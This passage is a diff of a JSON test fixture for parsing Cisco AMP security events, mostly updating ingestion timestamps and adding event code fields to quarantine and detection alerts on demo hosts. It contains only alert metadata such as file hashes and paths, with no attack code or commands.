found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6411538569722069000",
@@ -5269,8 +5334,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421036982Z",
+                "ingested": "2021-09-30T00:14:44.025383531Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "code": "553648155",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
                 "id": "6411538569722069000",
@@ -5346,8 +5412,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421038738Z",
+                "ingested": "2021-09-30T00:14:44.025387308Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411538569722069000",
@@ -5425,8 +5492,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421040475Z",
+                "ingested": "2021-09-30T00:14:44.025389632Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411538569722069000",
@@ -5508,8 +5576,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421042251Z",
+                "ingested": "2021-09-30T00:14:44.025391879Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411538569722069000",
@@ -5581,8 +5650,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421043996Z",
+                "ingested": "2021-09-30T00:14:44.025394104Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -5656,8 +5726,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421045731Z",
+                "ingested": "2021-09-30T00:14:44.025400013Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -5731,8 +5802,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421047484Z",
+                "ingested": "2021-09-30T00:14:44.025403940Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -5806,8 +5878,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421049240Z",
+                "ingested": "2021-09-30T00:14:44.025406294Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -5881,8 +5954,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421050976Z",
+                "ingested": "2021-09-30T00:14:44.025408560Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -5956,8 +6030,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421052916Z",
+                "ingested": "2021-09-30T00:14:44.025411051Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -6031,8 +6106,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421054684Z",
+                "ingested": "2021-09-30T00:14:44.025417712Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -6106,8 +6182,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421056465Z",
+                "ingested": "2021-09-30T00:14:44.025421062Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -6181,8 +6258,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421058225Z",
+                "ingested": "2021-09-30T00:14:44.025423352Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -6256,8 +6334,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421059970Z",
+                "ingested": "2021-09-30T00:14:44.025425605Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -6331,8 +6410,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421061745Z",
+                "ingested": "2021-09-30T00:14:44.025427909Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -6406,8 +6486,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421063478Z",
+                "ingested": "2021-09-30T00:14:44.025435026Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275399255032000",
@@ -6502,8 +6583,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421065230Z",
+                "ingested": "2021-09-30T00:14:44.025438494Z",
